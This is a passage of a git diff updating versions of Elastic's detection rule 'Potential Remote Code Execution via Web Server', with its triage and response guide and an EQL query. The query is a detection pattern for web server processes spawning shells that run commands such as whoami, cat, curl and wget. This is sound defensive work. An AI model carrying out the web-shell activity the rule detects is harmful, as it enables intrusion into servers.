potentially indicating attackers executing commands using the web shell.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate abnormal behaviors by the subject process such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential reverse shells or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Investigate the process information for malicious or uncommon processes/process trees.\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n - Investigate the process tree spawned from the user that is used to run the web application service. A user that is running a web application should not spawn other child processes.\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info for Webapp User\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes WHERE uid = {{process.user.id}}\"}}\n- Examine the command line to determine which commands or scripts were executed.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nevent.action in (\"exec\", \"exec_event\") and process.parent.executable : (\n \"/usr/sbin/nginx\", \"/usr/local/sbin/nginx\",\n \"/usr/sbin/apache\", \"/usr/local/sbin/apache\",\n \"/usr/sbin/apache2\", \"/usr/local/sbin/apache2\",\n \"/usr/sbin/php*\", \"/usr/local/sbin/php*\",\n \"/usr/sbin/lighttpd\", \"/usr/local/sbin/lighttpd\",\n \"/usr/sbin/hiawatha\", \"/usr/local/sbin/hiawatha\",\n \"/usr/local/bin/caddy\", \n \"/usr/local/lsws/bin/lswsctrl\",\n \"*/bin/catalina.sh\"\n) and\nprocess.name : (\"*sh\", \"python*\", \"perl\", \"php*\", \"tmux\") and\nprocess.args : (\"whoami\", \"id\", \"uname\", \"cat\", \"hostname\", \"ip\", \"curl\", \"wget\", \"pwd\")\n", "references": [ "https://pentestlab.blog/tag/web-shell/", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -96,7 +96,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_4.json b/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_4.json index 3b0fc8c70d9..638779aabcc 100644 --- a/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_4.json +++ b/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_4.json @@ -15,7 +15,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Remote Code Execution via Web Server", - "note": "## Triage and analysis\n\n### Investigating Potential Remote Code Execution via Web Server\n\nAdversaries may backdoor web servers with web shells to establish persistent access to systems. A web shell is a malicious script, often embedded into a compromised web server, that grants an attacker remote access and control over the server. This enables the execution of arbitrary commands, data exfiltration, and further exploitation of the target network.\n\nThis rule detects a web server process spawning script and command line interface programs, potentially indicating attackers executing commands using the web shell.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate abnormal behaviors by the subject process such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential reverse shells or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Investigate the process information for malicious or uncommon processes/process trees.\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n - Investigate the process tree spawned from the user that is used to run the web application service. A user that is running a web application should not spawn other child processes.\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info for Webapp User\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes WHERE uid = {{process.user.id}}\"}}\n- Examine the command line to determine which commands or scripts were executed.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Remote Code Execution via Web Server\n\nAdversaries may backdoor web servers with web shells to establish persistent access to systems. A web shell is a malicious script, often embedded into a compromised web server, that grants an attacker remote access and control over the server. This enables the execution of arbitrary commands, data exfiltration, and further exploitation of the target network.\n\nThis rule detects a web server process spawning script and command line interface programs, potentially indicating attackers executing commands using the web shell.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate abnormal behaviors by the subject process such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential reverse shells or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Investigate the process information for malicious or uncommon processes/process trees.\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n - Investigate the process tree spawned from the user that is used to run the web application service. A user that is running a web application should not spawn other child processes.\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info for Webapp User\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes WHERE uid = {{process.user.id}}\"}}\n- Examine the command line to determine which commands or scripts were executed.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nevent.action in (\"exec\", \"exec_event\") and process.parent.executable : (\n \"/usr/sbin/nginx\", \"/usr/local/sbin/nginx\",\n \"/usr/sbin/apache\", \"/usr/local/sbin/apache\",\n \"/usr/sbin/apache2\", \"/usr/local/sbin/apache2\",\n \"/usr/sbin/php*\", \"/usr/local/sbin/php*\",\n \"/usr/sbin/lighttpd\", \"/usr/local/sbin/lighttpd\",\n \"/usr/sbin/hiawatha\", \"/usr/local/sbin/hiawatha\",\n \"/usr/local/bin/caddy\", \n \"/usr/local/lsws/bin/lswsctrl\",\n \"*/bin/catalina.sh\"\n) and\nprocess.name : (\"*sh\", \"python*\", \"perl\", \"php*\", \"tmux\") and\nprocess.args : (\"whoami\", \"id\", \"uname\", \"cat\", \"hostname\", \"ip\", \"curl\", \"wget\", \"pwd\") and\nnot process.name == \"phpquery\"\n", "references": [ "https://pentestlab.blog/tag/web-shell/", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -97,7 +97,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_5.json b/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_5.json index 8a95cd3cd75..d728b8e7929 100644 --- a/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_5.json +++ b/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_5.json @@ -15,7 +15,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Remote Code Execution via Web Server", - "note": "## Triage and analysis\n\n### Investigating Potential Remote Code Execution via Web Server\n\nAdversaries may backdoor web servers with web shells to establish persistent access to systems. A web shell is a malicious script, often embedded into a compromised web server, that grants an attacker remote access and control over the server. This enables the execution of arbitrary commands, data exfiltration, and further exploitation of the target network.\n\nThis rule detects a web server process spawning script and command line interface programs, potentially indicating attackers executing commands using the web shell.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate abnormal behaviors by the subject process such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential reverse shells or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Investigate the process information for malicious or uncommon processes/process trees.\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n - Investigate the process tree spawned from the user that is used to run the web application service. A user that is running a web application should not spawn other child processes.\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info for Webapp User\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes WHERE uid = {{process.user.id}}\"}}\n- Examine the command line to determine which commands or scripts were executed.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Potential Remote Code Execution via Web Server\n\nAdversaries may backdoor web servers with web shells to establish persistent access to systems. A web shell is a malicious script, often embedded into a compromised web server, that grants an attacker remote access and control over the server. This enables the execution of arbitrary commands, data exfiltration, and further exploitation of the target network.\n\nThis rule detects a web server process spawning script and command line interface programs, potentially indicating attackers executing commands using the web shell.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate abnormal behaviors by the subject process such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential reverse shells or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Investigate the process information for malicious or uncommon processes/process trees.\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n - Investigate the process tree spawned from the user that is used to run the web application service. A user that is running a web application should not spawn other child processes.\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info for Webapp User\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes WHERE uid = {{process.user.id}}\"}}\n- Examine the command line to determine which commands or scripts were executed.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nevent.action in (\"exec\", \"exec_event\") and process.parent.executable : (\n \"/usr/sbin/nginx\", \"/usr/local/sbin/nginx\",\n \"/usr/sbin/apache\", \"/usr/local/sbin/apache\",\n \"/usr/sbin/apache2\", \"/usr/local/sbin/apache2\",\n \"/usr/sbin/php*\", \"/usr/local/sbin/php*\",\n \"/usr/sbin/lighttpd\", \"/usr/local/sbin/lighttpd\",\n \"/usr/sbin/hiawatha\", \"/usr/local/sbin/hiawatha\",\n \"/usr/local/bin/caddy\", \n \"/usr/local/lsws/bin/lswsctrl\",\n \"*/bin/catalina.sh\"\n) and\nprocess.name : (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"python*\", \"perl\", \"php*\", \"tmux\") and\nprocess.args : (\"whoami\", \"id\", \"uname\", \"cat\", \"hostname\", \"ip\", \"curl\", \"wget\", \"pwd\") and\nnot process.name == \"phpquery\"\n", "references": [ "https://pentestlab.blog/tag/web-shell/", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_6.json b/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_6.json index ad07881a5da..46d100b888d 100644 --- a/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_6.json +++ b/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_6.json @@ -15,7 +15,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Remote Code Execution via Web Server", - "note": "## Triage and analysis\n\n### Investigating Potential Remote Code Execution via Web Server\n\nAdversaries may backdoor web servers with web shells to establish persistent access to systems. A web shell is a malicious script, often embedded into a compromised web server, that grants an attacker remote access and control over the server. This enables the execution of arbitrary commands, data exfiltration, and further exploitation of the target network.\n\nThis rule detects a web server process spawning script and command line interface programs, potentially indicating attackers executing commands using the web shell.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate abnormal behaviors by the subject process such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential reverse shells or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Investigate the process information for malicious or uncommon processes/process trees.\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n - Investigate the process tree spawned from the user that is used to run the web application service. A user that is running a web application should not spawn other child processes.\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info for Webapp User\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes WHERE uid = {{process.user.id}}\"}}\n- Examine the command line to determine which commands or scripts were executed.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Potential Remote Code Execution via Web Server\n\nAdversaries may backdoor web servers with web shells to establish persistent access to systems. A web shell is a malicious script, often embedded into a compromised web server, that grants an attacker remote access and control over the server. This enables the execution of arbitrary commands, data exfiltration, and further exploitation of the target network.\n\nThis rule detects a web server process spawning script and command line interface programs, potentially indicating attackers executing commands using the web shell.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate abnormal behaviors by the subject process such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential reverse shells or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Investigate the process information for malicious or uncommon processes/process trees.\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n - Investigate the process tree spawned from the user that is used to run the web application service. A user that is running a web application should not spawn other child processes.\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info for Webapp User\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes WHERE uid = {{process.user.id}}\"}}\n- Examine the command line to determine which commands or scripts were executed.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nevent.action in (\"exec\", \"exec_event\") and process.parent.executable : (\n \"/usr/sbin/nginx\", \"/usr/local/sbin/nginx\",\n \"/usr/sbin/apache\", \"/usr/local/sbin/apache\",\n \"/usr/sbin/apache2\", \"/usr/local/sbin/apache2\",\n \"/usr/sbin/php*\", \"/usr/local/sbin/php*\",\n \"/usr/sbin/lighttpd\", \"/usr/local/sbin/lighttpd\",\n \"/usr/sbin/hiawatha\", \"/usr/local/sbin/hiawatha\",\n \"/usr/local/bin/caddy\", \n \"/usr/local/lsws/bin/lswsctrl\",\n \"*/bin/catalina.sh\"\n) and\nprocess.name : (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"python*\", \"perl\", \"php*\", \"tmux\") and\nprocess.args : (\"whoami\", \"id\", \"uname\", \"cat\", \"hostname\", 